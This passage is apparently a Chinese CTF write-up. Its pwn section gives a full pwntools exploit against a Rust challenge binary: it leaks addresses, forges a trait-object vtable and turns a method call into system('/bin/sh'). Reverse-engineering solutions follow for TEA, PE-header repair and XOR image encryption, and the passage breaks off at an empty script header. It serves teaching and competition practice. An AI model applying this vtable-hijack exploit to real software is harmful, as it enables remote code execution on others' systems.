\u9898\u76ee\u5728\u9690\u85cf\u5546\u54c1\u4e2d\u76f4\u63a5\u63d0\u4f9b\u4e86\u5173\u952e\u5730\u5740\uff0c\u4e0d\u9700\u8981\u6211\u4eec\u5728\u672c\u5730\u53bb\u8c03\u8bd5\u627e\u504f\u79fb\uff0c\u76f4\u63a5\u201c\u4e70\u201d\u60c5\u62a5\u5373\u53ef\u3002\n\n\u83b7\u53d6 Heap \u5730\u5740\uff1a\u8d2d\u4e70 \u9690\u85cf\u5546\u54c1 3\u3002\u7a0b\u5e8f\u4f1a\u6253\u5370\u51fa\u5f53\u524d User \u5bf9\u8c61\u4e2d Name \u5b57\u6bb5\u5728\u5806\u4e0a\u7684\u5185\u5b58\u5730\u5740\u3002\n\u83b7\u53d6 System \u5730\u5740\uff1a\u8d2d\u4e70 \u9690\u85cf\u5546\u54c1 5\u3002\u7a0b\u5e8f\u4f1a\u6253\u5370\u51fa system \u51fd\u6570\uff08\u6216\u8005 libc\u57fa\u5740\u76f8\u5173\uff09\u7684\u5185\u5b58\u5730\u5740\u3002\n\u600e\u4e48\u627e\u7684\uff1f\uff1a\u8fd9\u4e0d\u662f\u901a\u8fc7\u547d\u4ee4\u627e\u5230\u7684\uff0c\u800c\u662f\u9898\u76ee\u903b\u8f91\u4e2d\u5199\u6b7b\u7684\u3002\u5f53\u9501\u4e2d\u6bd2\u540e\uff0c\u5546\u5e97\u91cc\u4f1a\u591a\u51fa\u6765\u8fd9\u51e0\u4e2a\u9009\u9879\uff0c\u8d2d\u4e70\u540e\u7684\u56de\u663e\u5185\u5bb9\u91cc\u5305\u542b\u4e86 0x \u5f00\u5934\u7684\u5341\u516d\u8fdb\u5236\u6570\u636e\uff0c\u811a\u672c\u901a\u8fc7\u6b63\u5219\u63d0\u53d6\u8fd9\u4e9b\u5730\u5740\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4f2a\u9020\u865a\u8868<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Rust \u7684\u52a8\u6001\u5206\u53d1\uff08Trait Object\uff09\u5728\u5185\u5b58\u4e2d\u662f\u4e00\u4e2a\u201c\u80d6\u6307\u9488\u201d\uff0c\u5305\u542b\u4e24\u4e2a\u6307\u9488\uff1a\n\ndata_ptr: \u6307\u5411\u6570\u636e\uff08\u8fd9\u91cc\u662f Name\uff09\u3002\nvtable_ptr: \u6307\u5411\u865a\u51fd\u6570\u8868\uff08Vtable\uff09\u3002<\/code><\/pre>\n\n\n\n
\u6211\u4eec\u9700\u8981\u6784\u9020\u4e00\u4e2a\u4f2a\u9020\u7684 Role \u5bf9\u8c61\uff0c\u8986\u76d6\u539f\u672c\u7684\u7ed3\u6784\uff1a<\/p>\n\n\n\n
\u6784\u9020 Payload\uff1a\n\u5728 Name \u7684\u5f00\u5934\u5199\u5165 \/bin\/shx00\u3002\n\u5728 Name \u7684\u540e\u534a\u90e8\u5206\u4f2a\u9020\u4e00\u4e2a Vtable\u3002Vtable \u7684\u7b2c 4 \u9879\uff08\u504f\u79fb 0x18\uff09\u662f manifesto \u51fd\u6570\uff0c\u6211\u4eec\u5c06\u5b83\u4fee\u6539\u4e3a\u6cc4\u9732\u51fa\u6765\u7684 system \u5730\u5740\u3002\n\u8986\u76d6 Role \u5bf9\u8c61\u7684\u6307\u9488\uff1a\n\u8ba9 data_ptr \u6307\u5411 Name \u7684\u5730\u5740\uff08\u5373 \/bin\/sh\uff09\u3002\n\u8ba9 vtable_ptr \u6307\u5411 Name \u4e2d\u4f2a\u9020 Vtable \u7684\u4f4d\u7f6e\u3002<\/code><\/pre>\n\n\n\n
\u89e6\u53d1 RCE<\/p>\n\n\n\n
\u56de\u5230\u4e3b\u83dc\u5355\u9009\u62e9 Option 4 (\u72ec\u7acb\u5ba3\u8a00)\u3002\n\u7a0b\u5e8f\u4f1a\u8c03\u7528 role.manifesto()\u3002\n\u7531\u4e8e\u865a\u8868\u88ab\u52ab\u6301\uff0c\u5b9e\u9645\u6267\u884c\u7684\u662f system(\"\/bin\/sh\")\u3002\n\u62ff\u5230 Shell \u540e\u6267\u884c cat \/flag\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
#!\/usr\/bin\/env python3\n\nfrom pwn import *\n\nimport re\n\nimport time\n\nHOST = 'challenge.shc.tf'\n\nPORT = 31463\n\nBINARY = '.\/hello_rust'\n\ncontext.binary = ELF(BINARY, checksec=False)\n\ncontext.log_level = 'info'\n\nBAL_RE = re.compile(r'uFFE5(d+)')\n\nHEX_RE = re.compile(r'0x[0-9a-fA-F]+')\n\ndef start():\n    try:\n        return remote(HOST, PORT)\n    except Exception as e:\n        log.error(str(e))\n\ndef recv_menu(p):\n    return p.recvuntil(b'> ')\n\ndef parse_balance(data):\n    s = data.decode('utf-8', errors='ignore')\n    ms = list(BAL_RE.finditer(s))\n    return int(ms[-1].group(1)) if ms else 0\n\ndef poison(p):\n    log.info(\"[*] \u6b63\u5728\u5c1d\u8bd5\u8ba9 Mutex \u4e2d\u6bd2 (\u53d1\u9001 256 \u5230\u5546\u5e97)...\")\n    p.sendline(b'2')\n    p.recvuntil(b': ')\n    p.sendline(b'256')\n    return recv_menu(p)\n\ndef work_to(p, target, menu_data):\n    bal = parse_balance(menu_data)\n    log.info(f\"[*] \u5f00\u59cb\u6253\u5de5\uff0c\u76ee\u6807\u91d1\u989d: \uffe5{target} (\u5f53\u524d: \uffe5{bal})\")\n\n    start_ts = time.time()\n    while bal < target:\n        p.send(b'1n' * 5) \n        time.sleep(0.1)\n        p.clean()\n        p.sendline(b'1') \n        try:\n            menu_data = recv_menu(p)\n            bal = parse_balance(menu_data)\n            if bal % 500 < 100:\n                log.info(f\"    \u5f53\u524d\u4f59\u989d: \uffe5{bal}\")\n        except:\n            pass\n\n    log.success(f\"[*] \u6253\u5de5\u5b8c\u6210\uff0c\u4f59\u989d: \uffe5{bal}\")\n    return bal, menu_data\n\ndef shop_choice(p, idx):\n    p.sendline(b'2')\n    p.recvuntil(b': ')\n    p.sendline(str(idx).encode())\n    return recv_menu(p)\n\ndef edit_name(p, payload):\n    p.sendline(b'3')\n    p.recvuntil(b': ')\n    p.send(payload + b'n')\n    return recv_menu(p)\n\ndef extract_hex(data):\n    s = data.decode('utf-8', errors='ignore')\n    return [int(x, 16) for x in HEX_RE.findall(s)]\n\ndef build_payload(name_addr, system_addr):\n    vt_off = 0x40\n    cmd = b'\/bin\/shx00'\n\n    payload = bytearray()\n    payload += cmd\n    payload += b'A' * (0x24 - len(payload))\n    payload += p64(name_addr)\n    payload += p64(name_addr + vt_off)\n\n    if len(payload) < vt_off:\n        payload += b'B' * (vt_off - len(payload))\n\n    payload += b'C' * 0x18\n    payload += p64(system_addr)\n\n    return bytes(payload)\n\ndef main():\n    p = start()\n    menu = recv_menu(p)\n\n    try:\n        menu = poison(p)\n    except EOFError:\n        log.error(\"Poison \u5931\u8d25\")\n        return\n\n    _, menu = work_to(p, 3100, menu)\n\n    log.info(\"[*] \u8d2d\u4e70\u9690\u85cf\u5546\u54c1 3 (Heap Info)...\")\n    data = shop_choice(p, 3)\n\n    addrs = extract_hex(data)\n    if not addrs:\n        log.error(\"\u672a\u80fd\u6cc4\u9732 Name \u5730\u5740\")\n        return\n    name_addr = addrs[-1]\n    log.success(f\"Leak Name Addr: {hex(name_addr)}\")\n\n    bal = parse_balance(data)\n    if bal < 3000:\n        _, menu = work_to(p, 3100, data)\n\n    log.info(\"[*] \u8d2d\u4e70\u9690\u85cf\u5546\u54c1 5 (Text Info)...\")\n    data = shop_choice(p, 5)\n    addrs2 = extract_hex(data)\n    if not addrs2:\n        log.error(\"\u672a\u80fd\u6cc4\u9732 System \u5730\u5740\")\n        return\n    system_addr = addrs2[-1]\n    log.success(f\"Leak System Addr: {hex(system_addr)}\")\n\n    log.info(\"[*] \u53d1\u9001 RCE Payload...\")\n    payload = build_payload(name_addr, system_addr)\n    edit_name(p, payload)\n\n    log.info(\"[*] \u89e6\u53d1\u72ec\u7acb\u5ba3\u8a00 (Calling System)...\")\n    p.sendline(b'4')\n\n    p.interactive()\n\nif __name__ == '__main__':\n    main()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{d021fc79-f589-445f-8b5d-b724367699f7}<\/code><\/pre>\n\n\n\n
\u9636\u6bb53<\/strong>(0)<\/h2>\n\n\n\n
\u6ca1\u6709\u65f6\u95f4\u505a<\/p>\n\n\n\n
Reverse<\/h1>\n\n\n\n
\u9636\u6bb51<\/h2>\n\n\n\n
a_cup_of_tea<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u5206\u6790<\/p>\n\n\n\n
\u5206\u6790\u51fd\u6570 sub_134E<\/code>\uff0c\u53d1\u73b0\u5e38\u6570 1640531527<\/code>\u3002\u8ba1\u7b97\u53ef\u77e5 0 - 1640531527 = -1640531527<\/code>\uff0c\u5176\u5341\u516d\u8fdb\u5236\u8865\u7801\u4e3a 0x9E3779B9<\/code>\uff0c\u8fd9\u662f TEA \u7b97\u6cd5\u7684 Delta \u5e38\u6570\u3002\u7ed3\u5408\u5faa\u73af\u79fb\u4f4d\u903b\u8f91\uff0c\u786e\u8ba4\u7b97\u6cd5\u4e3a TEA<\/strong>\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Key \u83b7\u53d6<\/strong>\uff1a \u5728\u6821\u9a8c\u51fd\u6570 sub_1439<\/code> \u4e2d\uff0cTEA\u52a0\u5bc6\u4f7f\u7528\u7684\u5bc6\u94a5\u53c2\u6570\u4e3a aWelcomeToShctf_0<\/code>\u3002\u67e5\u770b\u6570\u636e\u6bb5\u53ef\u77e5\u5176\u5185\u5bb9\u4e3a\u5b57\u7b26\u4e32\uff1a welcome_to_SHCTF<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5bc6\u6587\u63d0\u53d6:<\/strong><\/p>\n\n\n\n
\u5728 sub_1439<\/code> \u4e2d\uff0c\u52a0\u5bc6\u540e\u7684\u7ed3\u679c\u4e0e\u4ee5\u4e0b\u786c\u7f16\u7801\u7684\u6570\u503c\u8fdb\u884c\u4e86\u6bd4\u8f83<\/p>\n\n\n\n
v[0] == -1699360031 (Hex: 0x9AB5D2E1)\nv[1] == -1120419751 (Hex: 0xBD37C059)\nv[2] == -1515845715 (Hex: 0xA5A607AD)\nv[3] == -1804683212 (Hex: 0x946EB834)<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import struct\n\ndef decrypt(v, k):\n    v0, v1 = v[0], v[1]\n    k0, k1, k2, k3 = k[0], k[1], k[2], k[3]\n    delta = 0x9E3779B9\n    sum_val = (delta * 32) & 0xFFFFFFFF\n    for _ in range(32):\n        v1 -= ((v0 << 4) + k2) ^ (v0 + sum_val) ^ ((v0 >> 5) + k3)\n        v1 &= 0xFFFFFFFF\n        v0 -= ((v1 << 4) + k0) ^ (v1 + sum_val) ^ ((v1 >> 5) + k1)\n        v0 &= 0xFFFFFFFF\n        sum_val -= delta\n        sum_val &= 0xFFFFFFFF\n    return v0, v1\n\nkey_str = b\"welcome_to_SHCTF\"\nkey = struct.unpack(\"<4I\", key_str)\ncipher = [0x9ab5d2e1, 0xbd37c059, 0xa5a607ad, 0x946eb834]\n\nm1 = decrypt(cipher[0:2], key)\nm2 = decrypt(cipher[2:4], key)\n\nflag = struct.pack(\"<2I\", *m1) + struct.pack(\"<2I\", *m2)\nprint(\"SHCTF{\" + flag.decode() + \"}\")<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{W0w_u_kN0w_t3A!!}<\/code><\/pre>\n\n\n\n
damagedPE<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4fee\u590d PE \u5934<\/p>\n\n\n\n
\u53d1\u73b0<\/strong>\uff1a\u4f7f\u7528 010 Editor \u6253\u5f00\u6587\u4ef6\uff0c\u53d1\u73b0 DOS \u5934\u6b63\u5e38 (MZ<\/code>)\uff0c\u4f46 PE \u7b7e\u540d\u5904\uff08\u504f\u79fb 0x80<\/code>\uff09\u4e3a 53 48<\/code> (“SH”)\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4fee\u590d\uff1a\u5c06\u504f\u79fb 0x80<\/code> \u5904\u7684 53 48<\/code> \u4fee\u6539\u4e3a\u6807\u51c6\u7b7e\u540d 50 45<\/code> (“PE”)\uff0c\u4fdd\u5b58\u6587\u4ef6\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag1<\/h3>\n\n\n\n
\u5c06\u4fee\u590d\u540e\u7684\u6587\u4ef6\u62d6\u5165 IDA \u6216\u8fd0\u884c\u3002<\/p>\n\n\n\n
\u903b\u8f91<\/strong>\uff1a\u51fd\u6570 sub_4016B9<\/code> \u5b58\u5728\u7b80\u5355\u5f02\u6216\u903b\u8f91 \u5bc6\u6587 ^ 85<\/code>\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8fd0\u884c\u4e5f\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{pe_struct_<\/code><\/pre>\n\n\n\n
flag2<\/h3>\n\n\n\n
\u7ebf\u7d22<\/strong>\uff1aHex \u89c6\u56fe\u63d0\u793a “section table hides SEC”\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53d1\u73b0\u8282\u8868\u4e2d\u5b58\u5728\u5f02\u5e38\u8282 .ctf<\/code>\u3002<\/p>\n\n\n\n
\u63d0\u53d6\uff1a\u76f4\u63a5\u67e5\u770b .ctf<\/code> \u8282\u7684 Raw Data\uff08\u6587\u4ef6\u504f\u79fb 0x2C00<\/code> \u5904\uff09\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53d1\u73b0\u660e\u6587\u5b57\u7b26\u4e32 h3ad3r_m4g1c_<\/code> \u4ee5\u53ca\u63d0\u793a “Please add the second IAT item content…”\u3002<\/p>\n\n\n\n
flag2<\/p>\n\n\n\n
h3ad3r_m4g1c_<\/code><\/pre>\n\n\n\n
flag3<\/h3>\n\n\n\n
\u63d0\u793a\u8981\u6c42\u6dfb\u52a0\u201c\u7b2c\u4e8c\u4e2a IAT \u9879\u76ee\u5185\u5bb9\u201d\u3002<\/p>\n\n\n\n
\u67e5\u770b\u5bfc\u5165\u8868\uff08Imports\uff09\uff0c\u7b2c 1 \u4e2a\u662f CloseHandle<\/code>\uff0c\u7b2c 2 \u4e2a\u662f CreateFileA<\/code>\u3002<\/p>\n\n\n\n
\u6309\u7167\u683c\u5f0f SHCTF{...}<\/code> \u7ec4\u5408\u5c31\u884c\u3002<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import struct\n\ndef get_flag():\n    try:\n        with open('damagedPE.exe', 'rb') as f:\n            d = f.read()\n    except:\n        with open('fixed_damagedPE.exe', 'rb') as f:\n            d = f.read()\n\n    pe_off = struct.unpack('<I', d[0x3C:0x40])[0]\n    num_sec = struct.unpack('<H', d[pe_off+6:pe_off+8])[0]\n    opt_sz = struct.unpack('<H', d[pe_off+20:pe_off+22])[0]\n    magic = struct.unpack('<H', d[pe_off+24:pe_off+26])[0]\n\n    if magic == 0x20B:\n        rva_imp = struct.unpack('<I', d[pe_off+24+112+8:pe_off+24+112+12])[0]\n    else:\n        rva_imp = struct.unpack('<I', d[pe_off+24+96+8:pe_off+24+96+12])[0]\n\n    secs = []\n    sec_start = pe_off + 24 + opt_sz\n    for i in range(num_sec):\n        off = sec_start + i * 40\n        sd = d[off:off+40]\n        v_addr = struct.unpack('<I', sd[12:16])[0]\n        raw_ptr = struct.unpack('<I', sd[20:24])[0]\n        v_size = struct.unpack('<I', sd[8:12])[0]\n        secs.append((v_addr, v_size, raw_ptr))\n\n    def rva2off(rva):\n        for va, vs, raw in secs:\n            if va <= rva < va + vs:\n                return rva - va + raw\n        return 0\n\n    imp_off = rva2off(rva_imp)\n    count = 0\n\n    while True:\n        orig_thunk = struct.unpack('<I', d[imp_off:imp_off+4])[0]\n        name_rva = struct.unpack('<I', d[imp_off+12:imp_off+16])[0]\n\n        if orig_thunk == 0 and name_rva == 0: break\n\n        thunk_rva = orig_thunk if orig_thunk != 0 else struct.unpack('<I', d[imp_off+16:imp_off+20])[0]\n        thunk_off = rva2off(thunk_rva)\n\n        while True:\n            if magic == 0x20B:\n                func_data = struct.unpack('<Q', d[thunk_off:thunk_off+8])[0]\n                step = 8\n                is_ord = func_data & (1 << 63)\n            else:\n                func_data = struct.unpack('<I', d[thunk_off:thunk_off+4])[0]\n                step = 4\n                is_ord = func_data & (1 << 31)\n\n            if func_data == 0: break\n\n            if not is_ord:\n                name_off = rva2off(func_data & 0x7FFFFFFF) + 2\n                func_name = \"\"\n                while d[name_off] != 0:\n                    func_name += chr(d[name_off])\n                    name_off += 1\n\n                count += 1\n                if count == 2:\n                    return func_name\n\n            thunk_off += step\n        imp_off += 20\n\nprint(f\"SHCTF{{pe_struct_h3ad3r_m4g1c_{get_flag()}}}\")<\/code><\/pre>\n\n\n\n
\u62fc\u63a5\u5c31\u884c<\/p>\n\n\n\n
SHCTF{pe_struct_h3ad3r_m4g1c_CreateFileA}<\/code><\/pre>\n\n\n\n
Safe Image Encryption<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u56fe\u7247\u52a0\u5bc6\u7684<\/p>\n\n\n\n
IDA\u5206\u6790<\/p>\n\n\n\n
\u770bMain\u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
__int64 __fastcall main(int a1, char **a2, char **a3)\n{\n  int v3; \/\/ r13d\n  __int64 v5; \/\/ r14\n  unsigned int v6; \/\/ ebx\n  int v7; \/\/ eax\n  int v8; \/\/ r13d\n  int v9; \/\/ r15d\n  unsigned __int64 v10; \/\/ rcx\n  char v11; \/\/ di\n  char v12; \/\/ si\n  unsigned __int64 v13; \/\/ rtt\n  char v14; \/\/ r9\n  unsigned __int16 v15; \/\/ bx\n  char v16; \/\/ di\n  unsigned __int8 v17; \/\/ si\n  char v18; \/\/ dl\n  int v19; \/\/ ebx\n  int v20; \/\/ r12d\n  char v22; \/\/ [rsp+15h] [rbp-2A3h]\n  char v23; \/\/ [rsp+16h] [rbp-2A2h]\n  char v24; \/\/ [rsp+17h] [rbp-2A1h]\n  char v25; \/\/ [rsp+23h] [rbp-295h] BYREF\n  unsigned int v26; \/\/ [rsp+24h] [rbp-294h] BYREF\n  unsigned int v27; \/\/ [rsp+28h] [rbp-290h] BYREF\n  char v28[4]; \/\/ [rsp+2Ch] [rbp-28Ch] BYREF\n  _QWORD v29[4]; \/\/ [rsp+30h] [rbp-288h] BYREF\n  __int64 v30; \/\/ [rsp+50h] [rbp-268h] BYREF\n  unsigned __int64 v31; \/\/ [rsp+58h] [rbp-260h]\n  _QWORD v32[73]; \/\/ [rsp+70h] [rbp-248h] BYREF\n\n  v32[65] = __readfsqword(0x28u);\n  if ( a1 <= 3 )\n  {\n    __printf_chk(2, \"Usage: %s <original.png> <key_file> <encrypted.png>n\", *a2);\n    return 1;\n  }\n  else\n  {\n    v5 = sub_EB59(a2[1], &v26, &v27, v28, 4);\n    if ( v5 )\n    {\n      std::ifstream::basic_ifstream(v32, a2[2], 8);\n      sub_FE54(&v30, *(_QWORD *)((char *)&v32[29] + *(_QWORD *)(v32[0] - 24LL)), 0xFFFFFFFFLL, 0, 0xFFFFFFFFLL, v29);\n      if ( v31 )\n      {\n        if ( v31 == 1003 )\n        {\n          sub_FF74(v29, (int)(4 * v27 * v26), &v25);\n          v7 = v3;\n          v8 = 0;\n          v9 = v7;\n          while ( (int)v27 > v8 )\n          {\n            v20 = 0;\n            v19 = v9;\n            while ( (int)v26 > v20 )\n            {\n              v10 = (int)(4 * (v20 + v8 * v26));\n              v22 = *(_BYTE *)(v5 + v10 + 1);\n              v23 = *(_BYTE *)(v5 + v10 + 2);\n              v24 = *(_BYTE *)(v5 + v10 + 3);\n              v11 = *(_BYTE *)(v30 + (v10 % v31 + 1) % v31);\n              v12 = *(_BYTE *)(v30 + (v10 % v31 + 2) % v31);\n              v13 = v10 % v31 + 3;\n              v14 = v8 * v8 + v11;\n              LOBYTE(v15) = v20 * v20 + *(_BYTE *)(v30 + v10 % v31) + (*(_BYTE *)(v30 + v10 % v31) ^ 0xAA);\n              v16 = v12 ^ (v20 * v8) ^ (3 * v11);\n              HIBYTE(v15) = v16;\n              v17 = v14 + ((2 * v12) ^ 0x66);\n              v18 = (*(_BYTE *)(v30 + v13 % v31) ^ 0x55) - 16;\n              v19 = (((*(unsigned __int8 *)(v30 + v13 % v31) ^ 0x55) - 16) << 24) | (v17 << 16) & 0xFFFFFF | v15;\n              *(_BYTE *)(v29[0] + v10) = *(_BYTE *)(v5 + v10)\n                                       ^ (v20 * v20 + *(_BYTE *)(v30 + v10 % v31) + (*(_BYTE *)(v30 + v10 % v31) ^ 0xAA));\n              *(_BYTE *)(v29[0] + v10 + 1) = v22 ^ v16;\n              *(_BYTE *)(v29[0] + v10 + 2) = v23 ^ v17;\n              *(_BYTE *)(v29[0] + v10 + 3) = v24 ^ v18;\n              ++v20;\n            }\n            v9 = v19;\n            ++v8;\n          }\n          sub_FBD3(a2[3], v26, v27, 4, v29[0], 4 * v26);\n          puts(\"Encryption completed.\");\n          sub_DB6D(v5);\n          sub_FEB0(v29);\n          v6 = 0;\n        }\n        else\n        {\n          puts(\"Hint: key length is 1003 characters.\");\n          v6 = 1;\n        }\n      }\n      else\n      {\n        puts(\"Key text is empty!\");\n        v6 = 1;\n      }\n      std::string::_M_dispose(&v30);\n      std::ifstream::~ifstream(v32);\n    }\n    else\n    {\n      puts(\"Error loading image.\");\n      return 1;\n    }\n  }\n  return v6;\n}<\/code><\/pre>\n\n\n\n
\u53ef\u4ee5\u68b3\u7406\u51fa\u7a0b\u5e8f\u7684\u52a0\u5bc6\u903b\u8f91\u3002\u7a0b\u5e8f\u8bfb\u53d6\u539f\u59cb\u56fe\u7247\u548c\u4e00\u4e2aKey\u6587\u4ef6\uff0c\u5bf9\u56fe\u7247\u50cf\u7d20\u8fdb\u884c\u52a0\u5bc6\u64cd\u4f5c\u3002<\/p>\n\n\n\n
\u5173\u952e<\/p>\n\n\n\n
Key\u957f\u5ea6\uff1a\u7a0b\u5e8f\u4e2d\u786c\u7f16\u7801\u63d0\u793a `Hint: key length is 1003 characters.`\uff0c\u4e14\u4ee3\u7801\u4e2d\u53d6\u6a21\u8fd0\u7b97\u4f7f\u7528\u7684\u53d8\u91cf `v31` \u4e5f\u662f 1003\u3002\n\u904d\u5386\u65b9\u5f0f\uff1a\u4ee3\u7801\u901a\u8fc7\u53cc\u5c42\u5faa\u73af\u904d\u5386\u56fe\u7247\u50cf\u7d20\uff0c`v8` \u5bf9\u5e94\u884c\u7d22\u5f15 `y`\uff0c`v20` \u5bf9\u5e94\u5217\u7d22\u5f15 `x`\u3002\n\u6570\u636e\u7ed3\u6784\uff1a\u56fe\u7247\u4ee5RGBA\u683c\u5f0f\u5b58\u50a8\uff0c\u6bcf\u4e2a\u50cf\u7d20\u53604\u5b57\u8282\u3002\u53d8\u91cf `v10` \u662f\u5f53\u524d\u50cf\u7d20\u7684\u5b57\u8282\u504f\u79fb\u91cf `v10 = 4 * (x + y * width)`\u3002<\/code><\/pre>\n\n\n\n
\u52a0\u5bc6\u7b97\u6cd5<\/p>\n\n\n\n
\u901a\u8fc7\u5206\u6790\u53ef\u4ee5\u77e5\u9053<\/p>\n\n\n\n
\u7a0b\u5e8f\u5bf9RGBA\u56db\u4e2a\u901a\u9053\u5206\u522b\u8fdb\u884c\u4e86\u4e0d\u540c\u7684\u5f02\u6216\uff08XOR\uff09\u52a0\u5bc6\uff0cKey\u7684\u4f7f\u7528\u662f\u5faa\u73af\u7684\uff08index % 1003<\/code>\uff09\u3002<\/p>\n\n\n\n
\u5047\u8bbe K<\/code> \u4e3aKey\u6570\u7ec4\uff0cL = 1003<\/code>\uff0c\u52a0\u5bc6\u903b\u8f91\u5982\u4e0b\uff1a<\/p>\n\n\n\n
Red\u901a\u9053 (\u504f\u79fb v10<\/code>):
$$
Key\u7d22\u5f15\uff1aidx = v10 % L
$$<\/p>\n\n\n\n
$$
\u52a0\u5bc6\u503c\uff1aR_enc = R_orig ^ (x*x + K[idx] + (K[idx] ^ 0xAA))
$$<\/p>\n\n\n\n
Green\u901a\u9053 (\u504f\u79fb v10+1<\/code>):
$$
Key\u7d22\u5f15\uff1aidx_g = (v10 % L + 1) % L\uff0c\u5bf9\u5e94\u4ee3\u7801\u4e2d\u7684\u53d8\u91cf v11 \u53d6\u503c\u3002
$$<\/p>\n\n\n\n
$$
Key\u7d22\u5f152\uff1aidx_b = (v10 % L + 2) % L\uff0c\u5bf9\u5e94\u4ee3\u7801\u4e2d\u7684\u53d8\u91cf v12 \u53d6\u503c\u3002
$$<\/p>\n\n\n\n
$$
\u4e2d\u95f4\u53d8\u91cf\uff1av16 = K[idx_b] ^ (x  y) ^ (3 <\/em> K[idx_g])
$$<\/p>\n\n\n\n
$$
\u52a0\u5bc6\u503c\uff1aG_enc = G_orig ^ v16
$$<\/p>\n\n\n\n
Blue\u901a\u9053 (\u504f\u79fb v10+2<\/code>):
$$
\u4e2d\u95f4\u53d8\u91cf\uff1av14 = y * y + K[idx_g]
$$<\/p>\n\n\n\n
$$
\u4e2d\u95f4\u53d8\u91cf\uff1av17 = v14 + ((2 * K[idx_b]) ^ 0x66)
$$<\/p>\n\n\n\n
$$
\u52a0\u5bc6\u503c\uff1aB_enc = B_orig ^ v17
$$<\/p>\n\n\n\n
Alpha\u901a\u9053 (\u504f\u79fb v10+3<\/code>):
$$
Key\u7d22\u5f15\uff1aidx_a = (v10 % L + 3) % L
$$<\/p>\n\n\n\n
$$
\u4e2d\u95f4\u53d8\u91cf\uff1av18 = (K[idx_a] ^ 0x55) – 16
$$<\/p>\n\n\n\n
$$
\u52a0\u5bc6\u503c\uff1aA_enc = A_orig ^ v18
$$<\/p>\n\n\n\n
\u89e3\u5bc6<\/p>\n\n\n\n
\u9898\u76ee\u6ca1\u6709\u7ed9\u51faKey\u6587\u4ef6\uff0c\u4f46\u8fd9\u662f\u4e00\u4e2a\u5178\u578b\u7684\u5df2\u77e5\u660e\u6587\u653b\u51fb\u573a\u666f\uff0c\u56e0\u4e3a\u6211\u4eec\u77e5\u9053\u8fd9\u4e2a\u662fpng\u56fe\u7247\u91cc\u9762\u662f\u6709\u56fa\u5b9a\u5185\u5bb9\u7684<\/p>\n\n\n\n
\u4e3b\u8981\u662f\u5728Alpha\u901a\u9053<\/p>\n\n\n\n
\u5728\u6807\u51c6\u7684PNG\u56fe\u7247\uff08\u975e\u900f\u660e\u56fe\uff09\u4e2d\uff0cAlpha\u901a\u9053\uff08\u900f\u660e\u5ea6\uff09\u7684\u503c\u901a\u5e38\u56fa\u5b9a\u4e3a 255 (0xFF)\u3002\n\u6211\u4eec\u53ef\u4ee5\u5229\u7528 encrypt.png \u4e2d\u7684 Alpha \u503c\u53cd\u63a8 Key\u3002<\/code><\/pre>\n\n\n\n
Key \u6062\u590d\u516c\u5f0f\u63a8\u5bfc\uff1a
$$
\u5df2\u77e5\uff1aA_enc = 0xFF ^ v18
$$<\/p>\n\n\n\n
$$
\u5373\uff1av18 = A_enc ^ 0xFF
$$<\/p>\n\n\n\n
\u4ee3\u5165 v18 \u7684\u8ba1\u7b97\u516c\u5f0f\uff1a
$$
A_enc ^ 0xFF = (K[idx_a] ^ 0x55) – 16
$$
\u79fb\u9879\uff1a
$$
K[idx_a] ^ 0x55 = (A_enc ^ 0xFF) + 16
$$
\u6700\u7ec8\u5f97\u5230 Key\uff1a<\/p>\n\n\n\n
K[idx_a] = (((A_enc ^ 0xFF) + 16) & 0xFF) ^ 0x55<\/code><\/pre>\n\n\n\n
\u7531\u4e8e Key \u957f\u5ea6\u4ec5\u4e3a 1003 \u5b57\u8282\uff0c\u800c\u56fe\u7247\u50cf\u7d20\u8fdc\u8d85\u8fd9\u4e2a\u6570\u91cf\uff0c\u6211\u4eec\u53ea\u9700\u904d\u5386\u56fe\u7247\u7684\u524d\u51e0\u884c\uff0c\u5229\u7528 Alpha \u901a\u9053\u586b\u6ee1 Key \u6570\u7ec4\uff0c\u5373\u53ef\u83b7\u5f97\u5b8c\u6574\u7684\u5bc6\u94a5\u3002<\/p>\n\n\n\n
\u8fd8\u539f<\/p>\n\n\n\n
\u7206\u7834Key\uff1a\u904d\u5386 encrypt.png \u7684\u50cf\u7d20\uff0c\u63d0\u53d6 Alpha \u503c\uff0c\u5229\u7528\u4e0a\u8ff0\u516c\u5f0f\u53cd\u63a8 Key \u7684\u6bcf\u4e00\u4e2a\u5b57\u8282\u3002\n\u9006\u5411\u89e3\u5bc6\uff1a\u83b7\u53d6\u5b8c\u6574 Key \u540e\uff0c\u6309\u7167\u52a0\u5bc6\u903b\u8f91\u9006\u63a8 R\u3001G\u3001B \u901a\u9053\u7684\u539f\u59cb\u503c\uff08XOR \u8fd0\u7b97\u662f\u53ef\u9006\u7684\uff0cA ^ B = C \u5219 C ^ B = A\uff09\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
